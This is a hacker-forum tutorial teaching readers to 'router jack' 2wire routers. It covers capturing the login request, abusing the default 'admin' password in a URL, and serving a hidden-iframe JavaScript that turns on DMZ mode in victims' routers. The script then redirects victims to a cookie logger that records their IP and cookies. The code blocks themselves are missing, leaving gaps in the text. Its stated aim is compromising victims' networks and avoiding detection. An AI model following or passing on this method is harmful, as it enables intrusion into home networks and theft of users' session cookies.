author;t3hmadhatt3r

Hello... Today I made some code to enable DMZ mode on my router (2wire) and I am going to show you how you can make your own scripts to do the same!

Notes are in BLUE Tips are in GREEN

Ok, the basic idea of this script we will is to abuse certain "features" that come with the router and take advantage of that fact that most people keep their router password at default because they can only be accessed from the inside right???. Not exactly ...Some of features we could take advantage of are Remote administration, Enabling DMZ, Disabling firewall protection, and others. To accomplish this we must first find a way to authenticate ourselves, second find a way to enable or change the features we please, third creating our router jacking script.

• Authentication

Router authentication varies on different routers so, we need to find how the user will authenticate and how we can do it using a URL. If the router uses a popup and makes you login as soon as you try to access it then you can authenticate simply by using



But, if the router uses form authentication then you must use other methods. Since my router makes you enter only a password when trying to access special components I could not use the username:password method because I only need to enter a password. I will show you exactly how I found how to login on my router using just a URL.

Note: Form authentication uses form fields are what we usually see on current sites like MySpace etc...If the router uses these try the http://username:password method anyway... it may work.

First I wanted to see what http request my browser was making to login so, I used burp proxy (Part of the burp suite) to watch the http request made by my browser.

Note: Burp Suite can be downloaded from http://portswigger.net/suite/.

I logged in and grabbed the following request with burp proxy.



As you can see, I am using the default password of admin. The request submits the parameters



So I decided to use them in a URL like so



And I was successfully logged in!!!

• Tampering with settings

Now, we will look for the features we want to tamper with... My router has a firewall we could disable and a DMZ mode we could enable. In this guide I will only enable the DMZ but, the firewall settings could be changed in the same way.

First I watched the request made when I enabled the DMZ mode and got the following



As you may of noticed, we now are submitting the cookie we received when we logged in. The problem with this is javascript will not store the cookies like a browser.I still needed the URL to activate DMZ mode anyway so just like last time I submitted the parameters within the URL like so



Of course this failed because a valid cookie wasn't submitted.Now I needed to find URL that would log me in and enable the DMZ at the same time. To find the appropriate parameters I opened my browser and tried to change the DMZ without being authenticated by using the URL above. It then said I needed a password to access that area. Can you guess what I did next??? Entered my password and grabbed the request sent to the router. That request looked something like this



Notice the PASSWORD parameter....

The parameter logged me in and enabled DMZ mode!! Exactly what we want!!!! Just like before I added the parameter to a URL like this

• Making our script

Now we need to make a .js file that will invisibly change change what we want and open a iframe to a valid page. To do this we will echo the javascript out so we can use the <iframe> tag inside our javascript file.... The code I came up with is



Note: As you can see, we also used the body tags..echoing out javascript can be very useful for many different things. Remember this.

This script opens an invisible iframe to change the victims routers settings and open a borderless iframe to google...Now you might be wondering how you will log their IP...Well we will make the script redirect to a info logger after 8 seconds to log the date, referer, ip, and guess what? Cookies as a bonus . Here is the updated script



Making the script redirect to google (Because thats where the iframe location was...This way we don't make the victim suspicious and there will be no evidence they were hacked because the page will redirect to a valid site) after 8 seconds allows the router jacker to completely load on most systems. The info.php file we are using is just 1nj3cth4x cookie logger. You can find it at http://1nj3ct.net/viewtopic.php?f=9&t=12. Everyone thank 1nj3cth4x! Ok now we have hacked there router, logged their ip, stolen their cookies, and logged the date....We can now connect to ports they have open on their box.

Tip: Don't forget to look for other "features" you can abuse.

Note: This router jacker works on my router. You can follow the same steps to hack other routers also...

Lastly, you need to know how to inject the script... It as easy as



You may be wondering how you know what type of router your victim is using?? Well, in the next tutorial I will show you how to enumerate routers.

Soon I will release router hacking packs for different routers... Look for them in the exploits section .

OK! I hope you learned allot and enjoyed reading! Please leave comments and suggestions..